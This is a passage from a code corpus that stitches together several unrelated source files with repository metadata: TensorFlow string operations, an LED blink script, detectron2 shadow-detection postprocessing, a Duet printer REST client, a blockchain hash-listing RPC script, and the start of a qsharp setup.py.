skip_empty: A `bool`. If `True`, skip the empty strings from the result.
delimiter: deprecated alias for `sep`.
Raises:
ValueError: If delimiter is not a string.
Returns:
A `SparseTensor` of rank `2`, the strings split according to the delimiter.
The first column of the indices corresponds to the row in `source` and the
second column corresponds to the index of the split component in this row.
"""
delimiter = deprecation.deprecated_argument_lookup(
"sep", sep, "delimiter", delimiter)
if delimiter is None:
delimiter = " "
delimiter = ops.convert_to_tensor(delimiter, dtype=dtypes.string)
source = ops.convert_to_tensor(source, dtype=dtypes.string)
indices, values, shape = gen_string_ops.string_split(
source, delimiter=delimiter, skip_empty=skip_empty)
indices.set_shape([None, 2])
values.set_shape([None])
shape.set_shape([2])
return sparse_tensor.SparseTensor(indices, values, shape)
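# Hedged illustration (added; not part of the original module): how the
# SparseTensor returned by string_split is typically inspected.  `tf` is
# assumed to be `import tensorflow as tf`; the values mirror the docstring
# example above.
#
#   st = string_split(tf.constant(["hello world", "a b c"]))
#   # st.indices     -> [[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]]
#   # st.values      -> [b'hello', b'world', b'a', b'b', b'c']
#   # st.dense_shape -> [2, 3]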
# Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which
# defines a wrapper for this function.
def string_split_v2(source, sep=None, maxsplit=-1):
"""Split elements of `source` based on `sep` into a `SparseTensor`.
Let N be the size of source (typically N will be the batch size). Split each
element of `source` based on `sep` and return a `SparseTensor`
containing the split tokens. Empty tokens are ignored.
For example, N = 2, source[0] is 'hello world' and source[1] is 'a b c',
then the output will be
st.indices = [0, 0;
0, 1;
1, 0;
1, 1;
1, 2]
st.shape = [2, 3]
st.values = ['hello', 'world', 'a', 'b', 'c']
If `sep` is given, consecutive delimiters are not grouped together and are
deemed to delimit empty strings. For example, source of `"1<>2<><>3"` and
sep of `"<>"` returns `["1", "2", "", "3"]`. If `sep` is None or an empty
string, consecutive whitespace are regarded as a single separator, and the
result will contain no empty strings at the start or end if the string has
leading or trailing whitespace.
Note that the above mentioned behavior matches python's str.split.
Args:
source: `1-D` string `Tensor`, the strings to split.
sep: `0-D` string `Tensor`, the delimiter character.
maxsplit: An `int`. If `maxsplit > 0`, limit of the split of the result.
Raises:
ValueError: If sep is not a string.
Returns:
A `SparseTensor` of rank `2`, the strings split according to the delimiter.
The first column of the indices corresponds to the row in `source` and the
second column corresponds to the index of the split component in this row.
"""
if sep is None:
sep = ""
sep = ops.convert_to_tensor(sep, dtype=dtypes.string)
source = ops.convert_to_tensor(source, dtype=dtypes.string)
indices, values, shape = gen_string_ops.string_split_v2(
source, sep=sep, maxsplit=maxsplit)
indices.set_shape([None, 2])
values.set_shape([None])
shape.set_shape([2])
return sparse_tensor.SparseTensor(indices, values, shape)
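# Hedged illustration (added; not part of the original module): the contrast
# between an explicit separator and the default whitespace behaviour described
# in the docstring above.  `tf` is assumed to be `import tensorflow as tf`.
#
#   string_split_v2(tf.constant(["1<>2<><>3"]), sep="<>").values
#   # -> [b'1', b'2', b'', b'3']   (empty tokens between separators are kept)
#   string_split_v2(tf.constant(["  a  b c "])).values
#   # -> [b'a', b'b', b'c']        (runs of whitespace collapse, no empty ends)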
def _reduce_join_reduction_dims(x, axis):
"""Returns range(rank(x) - 1, 0, -1) if axis is None; or axis otherwise."""
if axis is not None:
return axis
else:
# Fast path: avoid creating Rank and Range ops if ndims is known.
if x.get_shape().ndims is not None:
return constant_op.constant(
np.arange(x.get_shape().ndims - 1, -1, -1), dtype=dtypes.int32)
# Otherwise, we rely on Range and Rank to do the right thing at run-time.
return math_ops.range(array_ops.rank(x) - 1, -1, -1)
@tf_export(v1=["strings.reduce_join", "reduce_join"])
@deprecation.deprecated_args(None,
"keep_dims is deprecated, use keepdims instead",
"keep_dims")
@deprecation.deprecated_endpoints("reduce_join")
def reduce_join(inputs, axis=None, # pylint: disable=missing-docstring
keep_dims=None,
separator="",
name=None,
reduction_indices=None,
keepdims=None):
keepdims = deprecation.deprecated_argument_lookup("keepdims", keepdims,
"keep_dims", keep_dims)
if keep_dims is None:
keep_dims = False
axis = deprecation.deprecated_argument_lookup("axis", axis,
"reduction_indices",
reduction_indices)
return reduce_join_v2(
inputs=inputs,
axis=axis,
keepdims=keepdims,
separator=separator,
name=name)
@tf_export("strings.reduce_join", v1=[])
@dispatch.add_dispatch_support
def reduce_join_v2( # pylint: disable=missing-docstring
inputs,
axis=None,
keepdims=False,
separator="",
name=None):
"""Joins all strings into a single string, or joins along an axis.
>>> tf.strings.reduce_join([['abc','123'],
... ['def','456']]).numpy()
b'abc123def456'
>>> tf.strings.reduce_join([['abc','123'],
... ['def','456']], axis=-1).numpy()
array([b'abc123', b'def456'], dtype=object)
>>> tf.strings.reduce_join([['abc','123'],
... ['def','456']],
... axis=-1,
... separator=" ").numpy()
array([b'abc 123', b'def 456'], dtype=object)
Args:
inputs: A `tf.string` tensor.
axis: Which axis to join along. The default behavior is to join all
elements, producing a scalar.
keepdims: If true, retains reduced dimensions with length 1.
separator: a string added between each string being joined.
name: A name for the operation (optional).
Returns:
A `tf.string` tensor.
"""
with ops.name_scope(None, "ReduceJoin", [inputs, axis]):
inputs_t = ops.convert_to_tensor(inputs)
axis = _reduce_join_reduction_dims(inputs_t, axis)
return gen_string_ops.reduce_join(
inputs=inputs_t,
reduction_indices=axis,
keep_dims=keepdims,
separator=separator,
name=name)
reduce_join.__doc__ = reduce_join_v2.__doc__
# This wrapper provides backwards compatibility for code that predates the
# unit argument and that passed 'name' as a positional argument.
@tf_export(v1=["strings.length"])
@dispatch.add_dispatch_support
def string_length(input, name=None, unit="BYTE"):
"""Computes the length of each string given in the input tensor.
>>> strings = tf.constant(['Hello','TensorFlow', '🙂'])
>>> tf.strings.length(strings).numpy() # default counts bytes
array([ 5, 10, 4], dtype=int32)
>>> tf.strings.length(strings, unit="UTF8_CHAR").numpy()
array([ 5, 10, 1], dtype=int32)
Args:
input: A `Tensor` of type `string`. The strings for which to compute the
length for each element.
name: A name for the operation (optional).
unit: An optional `string` from: `"BYTE", "UTF8_CHAR"`. Defaults to
`"BYTE"`. The unit that is counted to compute string length. One of:
`"BYTE"` (for the number of bytes in each string) or `"UTF8_CHAR"` (for
the number of UTF-8 encoded Unicode code points in each string). Results
are undefined if `unit=UTF8_CHAR` and the `input` strings do not contain
structurally valid UTF-8.
Returns:
A `Tensor` of type `int32`, containing the length of the input string in
the same element of the input tensor.
"""
return gen_string_ops.string_length(input, unit=unit, name=name)
@tf_export("strings.length", v1=[])
@dispatch.add_dispatch_support
def string_length_v2(input, unit="BYTE", name=None):
return gen_string_ops.string_length(input, unit=unit, name=name)
string_length_v2.__doc__ = gen_string_ops.string_length.__doc__
@tf_export(v1=["substr"])
@deprecation.deprecated(None, "Use `tf.strings.substr` instead of `tf.substr`.")
def substr_deprecated(input, pos, len, name=None, unit="BYTE"):
return substr(input, pos, len, name=name, unit=unit)
substr_deprecated.__doc__ = gen_string_ops.substr.__doc__
@tf_export(v1=["strings.substr"])
@dispatch.add_dispatch_support
def substr(input, pos, len, name=None, unit="BYTE"):
return gen_string_ops.substr(input, pos, len, unit=unit, name=name)
substr.__doc__ = gen_string_ops.substr.__doc__
@tf_export("strings.substr", v1=[])
@dispatch.add_dispatch_support
def substr_v2(input, pos, len, unit="BYTE", name=None):
return gen_string_ops.substr(input, pos, len, unit=unit, name=name)
substr_v2.__doc__ = gen_string_ops.substr.__doc__
ops.NotDifferentiable("RegexReplace")
ops.NotDifferentiable("StringToHashBucket")
ops.NotDifferentiable("StringToHashBucketFast")
ops.NotDifferentiable("StringToHashBucketStrong")
ops.NotDifferentiable("ReduceJoin")
ops.NotDifferentiable("StringJoin")
ops.NotDifferentiable("StringSplit")
ops.NotDifferentiable("AsString")
ops.NotDifferentiable("EncodeBase64")
ops.NotDifferentiable("DecodeBase64")
@tf_export("strings.to_number", v1=[])
@dispatch.add_dispatch_support
def string_to_number(input, out_type=dtypes.float32, name=None):
r"""Converts each string in the input Tensor to the specified numeric type.
(Note that int32 overflow results in an error while float overflow
results in a rounded value.)
Examples:
>>> tf.strings.to_number("1.55")
<tf.Tensor: shape=(), dtype=float32, numpy=1.55>
>>> tf.strings.to_number("3", tf.int32)
<tf.Tensor: shape=(), dtype=int32, numpy=3>
Args:
input: A `Tensor` of type `string`.
out_type: An optional `tf.DType` from: `tf.float32, tf.float64, tf.int32,
tf.int64`. Defaults to `tf.float32`.
The numeric type to interpret each string in `string_tensor` as.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `out_type`.
"""
return gen_parsing_ops.string_to_number(input, out_type, name)
@tf_export(v1=["strings.to_number", "string_to_number"])
def string_to_number_v1(
string_tensor=None,
out_type=dtypes.float32,
name=None,
input=None):
string_tensor = deprecation.deprecated_argument_lookup(
"input", input, "string_tensor", string_tensor)
return gen_parsing_ops.string_to_number(string_tensor, out_type, name)
string_to_number_v1.__doc__ = gen_parsing_ops.string_to_number.__doc__
@tf_export("strings.to_hash_bucket", v1=[])
@dispatch.add_dispatch_support
def string_to_hash_bucket(input, num_buckets, name=None):
# pylint: disable=line-too-long
  r"""Converts each string in the input Tensor to its hash, modulo a given number of buckets.
The hash function is deterministic on the content of the string within the
process.
Note that the hash function may change from time to time.
This functionality will be deprecated and it's recommended to use
`tf.strings.to_hash_bucket_fast()` or `tf.strings.to_hash_bucket_strong()`.
Examples:
>>> tf.strings.to_hash_bucket(["Hello", "TensorFlow", "2.x"], 3)
<tf.Tensor: shape=(3,), dtype=int64, numpy=array([2, 0, 1])>
Args:
input: A `Tensor` of type `string`.
num_buckets: An `int` that is `>= 1`. The number of buckets.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`.
"""
# pylint: enable=line-too-long
return gen_string_ops.string_to_hash_bucket(input, num_buckets, name)
@tf_export(v1=["strings.to_hash_bucket", "string_to_hash_bucket"])
def string_to_hash_bucket_v1(
string_tensor=None,
num_buckets=None,
name=None,
input=None):
string_tensor = deprecation.deprecated_argument_lookup(
"input", input, "string_tensor", string_tensor)
return gen_string_ops.string_to_hash_bucket(string_tensor, num_buckets, name)
string_to_hash_bucket_v1.__doc__ = gen_string_ops.string_to_hash_bucket.__doc__
@tf_export("strings.join", v1=["strings.join", "string_join"])
@deprecation.deprecated_endpoints("string_join")
@dispatch.add_dispatch_support
def string_join(inputs, separator="", name=None):
"""Perform element-wise concatenation of a list of string tensors.
Given a list of string tensors of same shape, performs element-wise
concatenation of the strings of the same index in all tensors.
>>> tf.strings.join(['abc','def']).numpy()
b'abcdef'
>>> tf.strings.join([['abc','123'],
... ['def','456'],
... ['ghi','789']]).numpy()
array([b'abcdefghi', b'123456789'], dtype=object)
>>> tf.strings.join([['abc','123'],
... ['def','456']],
... separator=" ").numpy()
array([b'abc def', b'123 456'], dtype=object)
Args:
inputs: A list of `tf.Tensor` objects of same size and `tf.string` dtype.
separator: A string added between each string being joined.
name: A name for the operation (optional).
Returns:
A `tf.string` tensor.
"""
return gen_string_ops.string_join(inputs, separator=separator, name=name)
| 37.432247 | 100 | 0.680704 |
54ae8c29dc0b79ef643b52c18e7c2540f8426a26 | 147 | py | Python | test.py | cfreeman/hota-alinta | 70f07a853800bf051e17a51e099b9d8069a35561 | [
"Unlicense"
] | null | null | null | test.py | cfreeman/hota-alinta | 70f07a853800bf051e17a51e099b9d8069a35561 | [
"Unlicense"
] | null | null | null | test.py | cfreeman/hota-alinta | 70f07a853800bf051e17a51e099b9d8069a35561 | [
"Unlicense"
] | null | null | null | from gpiozero import LED
from time import sleep
led = LED(14)
while True:
led.on()
sleep(0.1)
led.off()
sleep(1)
| 13.363636 | 24 | 0.55102 |
a07c2964d8db6638677a8cff4f67c2d16ebc116d | 10,886 | py | Python | detectron2/modeling/postprocessing.py | sksmslhy/InstanceShadowDetection | 44f9910fb3e14bb03e0a30576021943bff8e4120 | [
"Apache-2.0"
] | 100 | 2020-06-10T08:34:20.000Z | 2022-03-28T17:08:46.000Z | detectron2/modeling/postprocessing.py | temperrain/InstanceShadowDetection | 1bcf911ba5dfdefbd22397409cd56e169040abe5 | [
"Apache-2.0"
] | 17 | 2020-06-12T13:13:42.000Z | 2022-03-12T00:34:37.000Z | detectron2/modeling/postprocessing.py | temperrain/InstanceShadowDetection | 1bcf911ba5dfdefbd22397409cd56e169040abe5 | [
"Apache-2.0"
] | 18 | 2020-06-20T04:05:53.000Z | 2022-03-01T06:58:47.000Z | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from torch.nn import functional as F
import math
import numpy as np
from detectron2.layers import paste_masks_in_image
from detectron2.structures import Boxes, BoxMode, Instances
import pysobatools.sobaeval as eval
def decode(segm):
return eval.maskUtils.decode(segm).astype('uint8')
def encode(segm):
return eval.maskUtils.encode(segm)
def detector_postprocess(results, output_height, output_width, mask_threshold=0.5):
"""
Resize the output instances.
The input images are often resized when entering an object detector.
As a result, we often need the outputs of the detector in a different
resolution from its inputs.
This function will resize the raw outputs of an R-CNN detector
to produce outputs according to the desired output resolution.
Args:
results (Instances): the raw outputs from the detector.
`results.image_size` contains the input image resolution the detector sees.
This object might be modified in-place.
output_height, output_width: the desired output resolution.
Returns:
Instances: the resized output from the model, based on the output resolution
"""
scale_x, scale_y = (output_width / results.image_size[1], output_height / results.image_size[0])
results = Instances((output_height, output_width), **results.get_fields())
if results.has("pred_boxes"):
output_boxes = results.pred_boxes
elif results.has("proposal_boxes"):
output_boxes = results.proposal_boxes
output_boxes.tensor[:, 0::2] *= scale_x
output_boxes.tensor[:, 1::2] *= scale_y
output_boxes.clip(results.image_size)
results = results[output_boxes.nonempty()]
if results.has("pred_masks"):
results.pred_masks = paste_masks_in_image(
results.pred_masks[:, 0, :, :], # N, 1, M, M
results.pred_boxes,
results.image_size,
threshold=mask_threshold,
)
if results.has("pred_keypoints"):
results.pred_keypoints[:, :, 0] *= scale_x
results.pred_keypoints[:, :, 1] *= scale_y
return results
def sem_seg_postprocess(result, img_size, output_height, output_width):
"""
Return semantic segmentation predictions in the original resolution.
    The input images are often resized when entering the semantic segmentor. Moreover, in some
    cases they are also padded inside the segmentor so that their size is divisible by the
    maximum network stride.
As a result, we often need the predictions of the segmentor in a different
resolution from its inputs.
Args:
result (Tensor): semantic segmentation prediction logits. A tensor of shape (C, H, W),
where C is the number of classes, and H, W are the height and width of the prediction.
img_size (tuple): image size that segmentor is taking as input.
output_height, output_width: the desired output resolution.
Returns:
semantic segmentation prediction (Tensor): A tensor of the shape
(C, output_height, output_width) that contains per-pixel soft predictions.
"""
result = result[:, : img_size[0], : img_size[1]].expand(1, -1, -1, -1)
result = F.interpolate(
result, size=(output_height, output_width), mode="bilinear", align_corners=False
)[0]
return result
def takeTwo(elm):
return elm[1]
def compute_iou(rec1, rec2):
    """
    param:
        rec1: (x0, y0, w, h)
        rec2: (x0, y0, w, h)
        x0, y0: the upper left point of rec.
        w, h: the length and width of rec.
    """
left_x = max(rec1[0], rec2[0])
left_y = max(rec1[1], rec2[1])
right_x = min(rec1[0] + rec1[2], rec2[0] + rec2[2])
right_y = min(rec1[1] + rec1[3], rec2[1] + rec2[3])
if left_x >= right_x or left_y >= right_y:
return 0
else:
S_mid = (right_y - left_y) * (right_x - left_x)
S_total = (rec1[2] * rec1[3]) + (rec2[2] * rec2[3]) - S_mid
return S_mid / S_total
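# Hedged example (added for illustration): two unit squares offset by half a
# side overlap in a 0.5 x 1 region, so IoU = 0.5 / (1 + 1 - 0.5) = 1/3.
#
#   compute_iou((0, 0, 1, 1), (0.5, 0, 1, 1))  # ~0.3333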
def box_combine(o, s, box1, box2):
"""
args:
box1 : (x1_0, y1_0, x1_1, y1_1)
box2: (x2_0, y2_0, x2_1, y2_1)
return:
dict["1_2":(min(x1_0,x2_0),min(y1_0,y2_0),max(x1_1,x2-1),max(y2_1,y2_2))]
"""
name = '{}_{}'.format(o, s)
combine = (min(box1[0], box2[0]), min(box1[1], box2[1]),
max(box1[2], box2[2]), max(box1[3], box2[3]))
combine = (combine[0], combine[1], combine[2] - combine[0],
combine[3] - combine[1]) # XYXY to XYWH
return [name, combine]
def compute_direction(box1,box2):
pass
def rect_distance(a, b):
x1, y1, x1b, y1b = a
x2, y2, x2b, y2b = b
left = x2b < x1
right = x1b < x2
bottom = y2b < y1
top = y1b < y2
if top and left:
return dist((x1, y1b), (x2b, y2))
elif left and bottom:
return dist((x1, y1), (x2b, y2b))
elif bottom and right:
return dist((x1b, y1), (x2, y2b))
elif right and top:
return dist((x1b, y1b), (x2, y2))
elif left:
return x1 - x2b
elif right:
return x2 - x1b
elif bottom:
return y1 - y2b
elif top:
return y2 - y1b
else:
return 0
def dist(a, b):
return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)
def matchor(instance, association):
results = []
objects = [i for i, v in enumerate(instance.pred_classes) if v == 0]
shadows = [i for i, v in enumerate(instance.pred_classes) if v == 1]
boxes = []
for o in objects:
if instance.scores[o] < 0.5:
continue
for s in shadows:
if instance.scores[s] < 0.5:
continue
o_box = instance.pred_boxes[o].tensor[0].numpy()
s_box = instance.pred_boxes[s].tensor[0].numpy()
o_area = (o_box[2] - o_box[0]) * (o_box[3] - o_box[1])
s_area = (s_box[2] - s_box[0]) * (s_box[3] - s_box[1])
if compute_iou((o_box[0], o_box[1], o_box[2] - o_box[0], o_box[3] - o_box[1]), (s_box[0], s_box[1], s_box[2] - s_box[0], s_box[3] - s_box[1])) == 0:
if rect_distance(o_box, s_box) >= s_box[3] - s_box[1]:
continue
boxes.append(box_combine(o, s, o_box, s_box))
ass_boxes = association.pred_boxes.tensor.numpy()
pair = []
for i, ass_box in enumerate(ass_boxes):
scores = []
ass_box = [ass_box[0], ass_box[1], ass_box[2] - ass_box[0], ass_box[3] - ass_box[1]]
for box in boxes:
k, v = box
scores.append([str(i) + '_' + k, compute_iou(ass_box, v)])
if len(ass_boxes) == 1:
pair.append(sorted(scores, key=takeTwo, reverse=True)[:1])
else:
pair.append(sorted(scores, key=takeTwo, reverse=True)[:1])
if not sum([sc[1] > 0.5 for sc in pair[i]]):
pair[i] = [[0, 0]]
O = {}
S = {}
for k, v in enumerate(pair):
if v != [[0, 0]] and v != []:
r, o, s = v[0][0].split('_')
if o in O:
if s in S:
if v[0][1] > O[o][1] and v[0][1] > S[s][1]:
O[o] = v[0]
S[s] = v[0]
else:
if v[0][1] > O[o][1]:
O[o] = v[0]
elif s in S:
if v[0][1] > S[s][1]:
S[s] = v[0]
else:
O[o] = v[0]
S[s] = v[0]
for k, v in S.items():
r, o, s = v[0].split('_')
results.append((int(o), int(s), int(r)))
ins_association = instance.pred_classes * 0
ret_association = association.pred_classes * 0
if results == []:
instance.pred_associations = ins_association
association.pred_associations = ret_association
return instance, association
association_id = 1
for i in results:
if ins_association[i[0]]+ins_association[i[1]] == 0:
ins_association[i[0]] = association_id
ins_association[i[1]] = association_id
ret_association[i[2]] = association_id
association_id += 1
instance.pred_associations = ins_association
association.pred_associations = ret_association
return instance, association
def combine_association(instance, association):
pred_masks = [mask.numpy() for mask in instance.pred_masks]
pred_scores = instance.scores.numpy()
pred_boxes = instance.pred_boxes.tensor.numpy().tolist()
pred_classes = instance.pred_classes.numpy()
h, w = pred_masks[0].shape
pred_associations = instance.pred_associations.numpy()
pred_light = association.pred_light.tensor.numpy()
ret = Instances((h,w))
ins = Instances((h,w))
if np.sum(pred_associations) == 0:
ret.pred_boxes = association.pred_boxes
ret.scores = association.scores
ret.pred_classes = association.pred_classes
ret.pred_light = association.pred_light.tensor.numpy().tolist()
segm = np.zeros((h,w,1),order='F',dtype='uint8')
ret.pred_masks = [segm] * len(association.pred_boxes)
ret.pred_associations = association.pred_associations.numpy().astype('int').tolist()
instance.pred_associations = pred_associations.astype('int').tolist()
return ret,instance
mask_map = {}
for i, ass in enumerate(pred_associations):
if ass != 0:
if ass in mask_map:
if pred_classes[i] == 1:
mask_map[ass].append((pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i]))
else:
mask_map[ass] = [(pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i]),mask_map[ass][0]]
else:
mask_map[ass] = [(pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i])]
results = []
boxes = []
scores = []
classes = []
associations = []
light = []
for i,ass in enumerate(association.pred_associations):
if ass != 0:
light.append(pred_light[i].tolist())
for k, v in mask_map.items():
associations.append(int(k))
s, o = v
avg_score = float((s[1]+ o[1])/2)
_s = s[0].reshape(h,w,1)
_o = o[0].reshape(h,w,1)
comb = _s + _o
classes.append(0)
segm = encode(np.array(comb,order='F',dtype='uint8'))[0]
boxes.append(BoxMode.convert(eval.maskUtils.toBbox(segm), BoxMode.XYWH_ABS, BoxMode.XYXY_ABS))
results.append(comb)
scores.append(avg_score)
ret.pred_masks = results
ret.pred_boxes = boxes
ret.scores = scores
ret.pred_classes = classes
ret.pred_associations = associations
ret.pred_light= light
instance.pred_associations = instance.pred_associations.numpy().astype('int').tolist()
return ret,instance
| 34.55873 | 160 | 0.593331 |
1fc57994749a3a64e86cace471d7de063b4cdaca | 4,180 | py | Python | duetwebapi/api/dwc_api.py | AndyEveritt/DuetWebAPI | 7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd | [
"MIT"
] | 8 | 2021-01-28T16:29:12.000Z | 2022-03-27T04:15:01.000Z | duetwebapi/api/dwc_api.py | AndyEveritt/DuetWebAPI | 7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd | [
"MIT"
] | 1 | 2021-04-14T14:54:08.000Z | 2021-04-21T15:54:41.000Z | duetwebapi/api/dwc_api.py | AndyEveritt/DuetWebAPI | 7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd | [
"MIT"
] | 1 | 2021-02-05T03:40:50.000Z | 2021-02-05T03:40:50.000Z | import logging
import os
from typing import Dict, List, Union
from io import StringIO, TextIOWrapper, BytesIO
import requests
from .base import DuetAPI
class DWCAPI(DuetAPI):
"""
Duet Web Control REST API Interface.
Used with a Duet 2/3 in standalone mode.
Must use RRF3.
"""
api_name = 'DWC_REST'
def connect(self, password=''):
""" Start connection to Duet """
url = f'{self.base_url}/rr_connect'
r = requests.get(url, {'password': password})
if not r.ok:
raise ValueError
return r.json()
def disconnect(self):
""" End connection to Duet """
url = f'{self.base_url}/rr_disconnect'
r = requests.get(url)
if not r.ok:
raise ValueError
return r.json()
def get_model(self, key: str = None, depth: int = 99, verbose: bool = True, null: bool = True, frequent: bool = False, obsolete: bool = False) -> Dict:
url = f'{self.base_url}/rr_model'
flags = f'd{depth}'
flags += 'v' if verbose is True else ''
flags += 'n' if null is True else ''
flags += 'f' if frequent is True else ''
flags += 'o' if obsolete is True else ''
r = requests.get(url, {'flags': flags, 'key': key})
if not r.ok:
raise ValueError
j = r.json()
return j['result']
def _get_reply(self) -> Dict:
url = f'{self.base_url}/rr_reply'
r = requests.get(url)
if not r.ok:
raise ValueError
return r.text
def send_code(self, code: str) -> Dict:
url = f'{self.base_url}/rr_gcode'
r = requests.get(url, {'gcode': code})
if not r.ok:
raise ValueError
reply = self._get_reply()
return {'response': reply}
def get_file(self, filename: str, directory: str = 'gcodes', binary: bool = False) -> str:
"""
filename: name of the file you want to download including extension
directory: the folder that the file is in, options are ['gcodes', 'macros', 'sys']
binary: return binary data instead of a string
returns the file as a string or binary data
"""
url = f'{self.base_url}/rr_download'
r = requests.get(url, {'name': f'/{directory}/{filename}'})
if not r.ok:
raise ValueError
if binary:
return r.content
else:
return r.text
def upload_file(self, file: Union[str, bytes, StringIO, TextIOWrapper, BytesIO], filename: str, directory: str = 'gcodes') -> Dict:
url = f'{self.base_url}/rr_upload?name=/{directory}/{filename}'
r = requests.post(url, data=file)
if not r.ok:
raise ValueError
return r.json()
def get_fileinfo(self, filename: str = None, directory: str = 'gcodes') -> Dict:
url = f'{self.base_url}/rr_fileinfo'
if filename:
r = requests.get(url, {'name': f'/{directory}/{filename}'})
else:
r = requests.get(url)
if not r.ok:
raise ValueError
return r.json()
def delete_file(self, filename: str, directory: str = 'gcodes') -> Dict:
url = f'{self.base_url}/rr_delete'
r = requests.get(url, {'name': f'/{directory}/{filename}'})
if not r.ok:
raise ValueError
return r.json()
def move_file(self, from_path, to_path, **_ignored):
# BUG this doesn't work currently
raise NotImplementedError
url = f'{self.base_url}/rr_move'
r = requests.get(url, {'old': f'{from_path}', 'new': f'{to_path}'})
if not r.ok:
raise ValueError
return r.json()
def get_directory(self, directory: str) -> List[Dict]:
url = f'{self.base_url}/rr_filelist'
r = requests.get(url, {'dir': f'/{directory}'})
if not r.ok:
raise ValueError
return r.json()['files']
def create_directory(self, directory: str) -> Dict:
url = f'{self.base_url}/rr_mkdir'
r = requests.get(url, {'dir': f'/{directory}'})
if not r.ok:
raise ValueError
return r.json()
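    # -----------------------------------------------------------------------
    # Hedged usage sketch (added for illustration).  The constructor argument
    # is an assumption -- it is handled by the DuetAPI base class, which is
    # not shown in this file.
    #
    #   api = DWCAPI('http://duet3.local')
    #   api.connect()
    #   api.send_code('G28')                              # home all axes
    #   with open('part.gcode', 'rb') as f:
    #       api.upload_file(f, 'part.gcode')
    #   print(api.get_fileinfo('part.gcode'))
    #   api.disconnect()
    # -----------------------------------------------------------------------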
| 32.913386 | 155 | 0.566029 |
73bb7606df83d72c9922408e611480a60d2e0717 | 3,036 | py | Python | contrib/linearize/linearize-hashes.py | RottenCoin/agouti | 745e1c8bffe286a517dff6d5ba69e39630e772e3 | [
"MIT"
] | 6 | 2018-10-31T10:43:13.000Z | 2021-05-02T15:41:26.000Z | contrib/linearize/linearize-hashes.py | RottenCoin/agouti | 745e1c8bffe286a517dff6d5ba69e39630e772e3 | [
"MIT"
] | null | null | null | contrib/linearize/linearize-hashes.py | RottenCoin/agouti | 745e1c8bffe286a517dff6d5ba69e39630e772e3 | [
"MIT"
] | 4 | 2018-09-18T15:42:38.000Z | 2019-10-27T19:02:53.000Z | #!/usr/bin/python
#
# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2014 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function
import json
import struct
import re
import base64
import httplib
import sys
settings = {}
class BitcoinRPC:
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def execute(self, obj):
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print("JSON-RPC: no response", file=sys.stderr)
return None
body = resp.read()
resp_obj = json.loads(body)
return resp_obj
@staticmethod
def build_request(idx, method, params):
obj = { 'version' : '1.1',
'method' : method,
'id' : idx }
if params is None:
obj['params'] = []
else:
obj['params'] = params
return obj
@staticmethod
def response_is_error(resp_obj):
return 'error' in resp_obj and resp_obj['error'] is not None
def get_block_hashes(settings, max_blocks_per_call=10000):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpassword'])
height = settings['min_height']
while height < settings['max_height']+1:
num_blocks = min(settings['max_height']+1-height, max_blocks_per_call)
batch = []
for x in range(num_blocks):
batch.append(rpc.build_request(x, 'getblockhash', [height + x]))
reply = rpc.execute(batch)
for x,resp_obj in enumerate(reply):
if rpc.response_is_error(resp_obj):
print('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr)
exit(1)
assert(resp_obj['id'] == x) # assume replies are in-sequence
print(resp_obj['result'])
height += num_blocks
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: linearize-hashes.py CONFIG-FILE")
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6161
if 'min_height' not in settings:
settings['min_height'] = 0
if 'max_height' not in settings:
settings['max_height'] = 313000
if 'rpcuser' not in settings or 'rpcpassword' not in settings:
		print("Missing username and/or password in cfg file", file=sys.stderr)
sys.exit(1)
settings['port'] = int(settings['port'])
settings['min_height'] = int(settings['min_height'])
settings['max_height'] = int(settings['max_height'])
get_block_hashes(settings)
| 26.631579 | 90 | 0.682477 |
680389e6a402a9694bd5e5c9ad07f1d8a0b920ba | 2,026 | py | Python | src/Python/qsharp-core/setup.py | jond01/iqsharp | 4324d1d6de03102edf5fd210b6f22655ee9b6fa2 | [
"MIT"
] | 115 | 2019-07-11T16:41:24.000Z | 2022-02-06T13:30:32.000Z | src/Python/qsharp-core/setup.py | jond01/iqsharp | 4324d1d6de03102edf5fd210b6f22655ee9b6fa2 | [
"MIT"
] | 346 | 2019-07-11T17:26:31.000Z | 2022-03-30T06:52:51.000Z | src/Python/qsharp-core/setup.py | jond01/iqsharp | 4324d1d6de03102edf5fd210b6f22655ee9b6fa2 | [
"MIT"
] | 50 | 2019-07-23T16:03:02.000Z | 2022-03-29T21:01:14.000Z | #!/bin/env python
# -*- coding: utf-8 -*-
##
# setup.py: Installs Python host functionality for Q#.
##
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
##
## IMPORTS ##
import setuptools
import os
## VERSION INFORMATION ##
# Our build process sets the PYTHON_VERSION environment variable to a version
# string that is compatible with PEP 440, and so we inherit that version number
# here and propagate that to qsharp/version.py.
#
# To make sure that local builds still work without the same environment
# variables, we'll default to 0.0.0.1 as a development version.
version = os.environ.get('PYTHON_VERSION', '0.0.0.1')
with open('./qsharp/version.py', 'w') as f:
f.write(f'''# Auto-generated file, do not edit.
##
